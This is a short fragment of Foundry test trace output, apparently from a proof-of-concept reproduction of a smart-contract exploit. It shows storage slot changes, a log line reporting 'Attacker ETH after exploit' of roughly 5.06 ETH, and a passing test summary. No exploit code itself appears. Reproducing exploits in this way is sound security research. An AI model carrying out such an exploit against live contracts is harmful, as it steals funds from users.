    │   │   └─ ← [Return] [1000000000000000000000000000000 [1e30], 184117530218781103780477139 [1.841e26], 12432485917 [1.243e10], 3114548664449539463 [3.114e18]]
    │   ├─  storage changes:
    │   │   @ 36: 0 → 0x000000000000000000000000ef811eaac5602399b5438090c851fb455bffe529
    │   │   @ 31: 0 → 0x00000000000000000000003541499cda8ca51b24724bb8e7ce569727406e0401
    │   │   @ 12: 0 → 1
    │   │   @ 0: 0x000000000000000000000000bbf4bf38a93b04a0ad4dc37952b155f8e6db7508 → 0x000000000000000000000000ef811eaac5602399b5438090c851fb455bffe529
    │   │   @ 0xc9d35a173db7df5a0066c0800391da2210f22c8896e9ac55d1b43705a9b05137: 0 → 0x000000000000000000000000000000000785ee10d5da46d900f436a000000000
    │   │   @ 32: 0 → 0x0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
    │   │   @ 0xaff06d421a9c3a354ad44aa4aa34edf498b563219983eda5b322a6f51445a9f1: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   @ 34: 0 → 0x000000000000000000000000ea0abf7ab2f8f8435e7dc4932ffab37761267843
    │   │   @ 35: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 33: 0 → 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2
    │   └─ ← [Return] 15255 bytes of code
    ├─ emit log_named_decimal_uint(key: "[End] Attacker ETH after exploit", val: 5063858067635448251 [5.063e18], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 15.37s (13.97s CPU time)

Ran 2 test suites in 16.34s (16.10s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
